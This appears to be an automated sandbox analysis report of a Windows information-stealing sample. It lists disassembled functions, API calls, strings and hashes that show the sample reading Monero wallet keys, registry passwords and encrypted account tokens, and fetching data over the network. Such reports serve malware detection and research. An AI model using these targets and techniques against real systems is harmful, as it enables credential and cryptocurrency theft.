Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 7292348c10ab74950666d461ecd11696a6d18174767dd269c5e2048c9fd8d1b8
Instruction ID: 5b6ff92f3ac8d1700b01fc4eea59dbdb74f98639b10e93a454f193ebb4290c5b
Opcode Fuzzy Hash: 7292348c10ab74950666d461ecd11696a6d18174767dd269c5e2048c9fd8d1b8
Instruction Fuzzy Hash: E55112B1D501195BCB15FB60DD92FED73BCAF54300F4045E8B60AA2091EE746B89CBA6

Function 00B875D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B872D0: memset.MSVCRT ref: 00B87314
Part of subcall function 00B872D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00B8733A
Part of subcall function 00B872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B873B1
Part of subcall function 00B872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B8740D
Part of subcall function 00B872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00B87452
Part of subcall function 00B872D0: HeapFree.KERNEL32(00000000), ref: 00B87459

lstrcat.KERNEL32(2FA07020,00BA17FC), ref: 00B87606
lstrcat.KERNEL32(2FA07020,00000000), ref: 00B87648
lstrcat.KERNEL32(2FA07020, : ), ref: 00B8765A
lstrcat.KERNEL32(2FA07020,00000000), ref: 00B8768F
lstrcat.KERNEL32(2FA07020,00BA1804), ref: 00B876A0
lstrcat.KERNEL32(2FA07020,00000000), ref: 00B876D3
lstrcat.KERNEL32(2FA07020,00BA1808), ref: 00B876ED
task.LIBCPMTD ref: 00B876FB

Strings

: , xrefs: 00B8764E

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
String ID: :
API String ID: 3191641157-3653984579
Opcode ID: 128b35d579a046a39589c8c1bc114afd17d059072bd6c341128b2712261625c4
Instruction ID: 10283514a5b772ef0e0f1c885fb736dd6227722bec3bd54b9c20fcda71a5da64
Opcode Fuzzy Hash: 128b35d579a046a39589c8c1bc114afd17d059072bd6c341128b2712261625c4
Instruction Fuzzy Hash: 0F312F7194020ADBCB04FBE8DC99DEE77B9AB44305B244558F102E7361DE34A946DB61

Function 00B872D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00B87314
RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 00B8733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B873B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B8740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00B87452
HeapFree.KERNEL32(00000000), ref: 00B87459
task.LIBCPMTD ref: 00B87555

Strings

Password, xrefs: 00B87401

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuememsettask
String ID: Password
API String ID: 2808661185-3434357891
Opcode ID: 73079027f839766988d27244cccdac0177316fe84ab9dfcdf22917694f1f1aee
Instruction ID: 6dcd8062e92ed9948abd4b528589d6c790ad6b2b06f86fe74a49718f0a2f0a8d
Opcode Fuzzy Hash: 73079027f839766988d27244cccdac0177316fe84ab9dfcdf22917694f1f1aee
Instruction Fuzzy Hash: A76139B18442289BDB24EB50CC85BD9B7F8FF44304F1481E9E689A6251DF709BC9CFA0

Function 00B97500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00B97542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B9757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B97603
RtlAllocateHeap.NTDLL(00000000), ref: 00B9760A
wsprintfA.USER32 ref: 00B97640

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Strings

\, xrefs: 00B97560
C, xrefs: 00B9754C
:, xrefs: 00B9755C

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 25b6b18c758a0cc034972d427812a0b2c48cc1dd8a3f5a9b1eb8f402b429b6d4
Instruction ID: 0110aea68634f058052f8935eb816458b458fa68ba9cb137c66a6403718bd2ae
Opcode Fuzzy Hash: 25b6b18c758a0cc034972d427812a0b2c48cc1dd8a3f5a9b1eb8f402b429b6d4
Instruction Fuzzy Hash: 7D416FB1944248ABDF10DF98DC85BEEBBF8EF19704F1001A9F509A7280DB746A44CBA5

Function 00B8BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00B9A740: lstrcpy.KERNEL32(00BA0E17,00000000), ref: 00B9A788

Part of subcall function 00B9A9B0: lstrlen.KERNEL32(?,01339040,?,\Monero\wallet.keys,00BA0E17), ref: 00B9A9C5
Part of subcall function 00B9A9B0: lstrcpy.KERNEL32(00000000), ref: 00B9AA04
Part of subcall function 00B9A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B9AA12

Part of subcall function 00B9A920: lstrcpy.KERNEL32(00000000,?), ref: 00B9A972
Part of subcall function 00B9A920: lstrcat.KERNEL32(00000000), ref: 00B9A982

Part of subcall function 00B9A8A0: lstrcpy.KERNEL32(?,00BA0E17), ref: 00B9A905

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

lstrlen.KERNEL32(00000000), ref: 00B8BC9F

Part of subcall function 00B98E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B98E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 00B8BCCD
lstrlen.KERNEL32(00000000), ref: 00B8BDA5
lstrlen.KERNEL32(00000000), ref: 00B8BDB9

Strings

AccountTokens, xrefs: 00B8BABA
AccountTokens, xrefs: 00B8BB49
AccountId, xrefs: 00B8BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 00B8BBEB

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: f53ed8d92e4bde8ecffa2ed47df5f658ad4a60bb4d8f07a1546c50efa1ddb3cb
Instruction ID: c5440c9d9a08de8e1962617037bcd1c7bcd22a31154ebbb293c1dcde5d0617d8
Opcode Fuzzy Hash: f53ed8d92e4bde8ecffa2ed47df5f658ad4a60bb4d8f07a1546c50efa1ddb3cb
Instruction Fuzzy Hash: 9DB11E71910118ABDF04FBA4DD96EEE73B8BF54300F4045A8F506B61A1EF346A49CBA6

Function 00B84FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B84FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00B84FD1
InternetOpenA.WININET(00BA0DDF,00000000,00000000,00000000,00000000), ref: 00B84FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B85011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B85041
InternetCloseHandle.WININET(?), ref: 00B850B9
InternetCloseHandle.WININET(?), ref: 00B850C6

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 2a34e34e70b4b3a2154df5c712ec0998a733cb6f433851754c0d453e152fab91
Instruction ID: 3ea4e4de7738fbdb73891407663e9b4a7f56536c9922b5040f0e2c6c32b212a1
Opcode Fuzzy Hash: 2a34e34e70b4b3a2154df5c712ec0998a733cb6f433851754c0d453e152fab91
Instruction Fuzzy Hash: 4631E6B4A0021DABDB20DF54DC85BDDB7B4FB48708F1081D9EA09A7291D7706A85CFA9

Function 00B98100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0133E2F8,00000000,?,00BA0E2C,00000000,?,00000000), ref: 00B98130
RtlAllocateHeap.NTDLL(00000000), ref: 00B98137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B98158
wsprintfA.USER32 ref: 00B981AC

Strings

@, xrefs: 00B9814D
%d MB, xrefs: 00B981A3

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: 2338aa593f29cc31f39f15b69ced5f1b2ac225dbce2c16ac312a655d193ca968
Instruction ID: a07ae00cb1b1049d4c1c56293d2caceeef9b95202a74c1725624ed8ec835b916
Opcode Fuzzy Hash: 2338aa593f29cc31f39f15b69ced5f1b2ac225dbce2c16ac312a655d193ca968
Instruction Fuzzy Hash: 862129B1A44219ABDB00DFD5CD49FAEB7B8EB49B04F104559F605BB280C77859018BA5

Function 00B983DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B98426
wsprintfA.USER32 ref: 00B98459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00B9847B
RegCloseKey.ADVAPI32(00000000), ref: 00B9848C
RegCloseKey.ADVAPI32(00000000), ref: 00B98499

Part of subcall function 00B9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B9A7E6

RegQueryValueExA.KERNEL32(00000000,0133E100,00000000,000F003F,?,00000400), ref: 00B984EC
lstrlen.KERNEL32(?), ref: 00B98501
RegQueryValueExA.KERNEL32(00000000,0133E340,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00BA0B34), ref: 00B98599
RegCloseKey.KERNEL32(00000000), ref: 00B98608
RegCloseKey.ADVAPI32(00000000), ref: 00B9861A

Strings

%s\%s, xrefs: 00B9844D

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
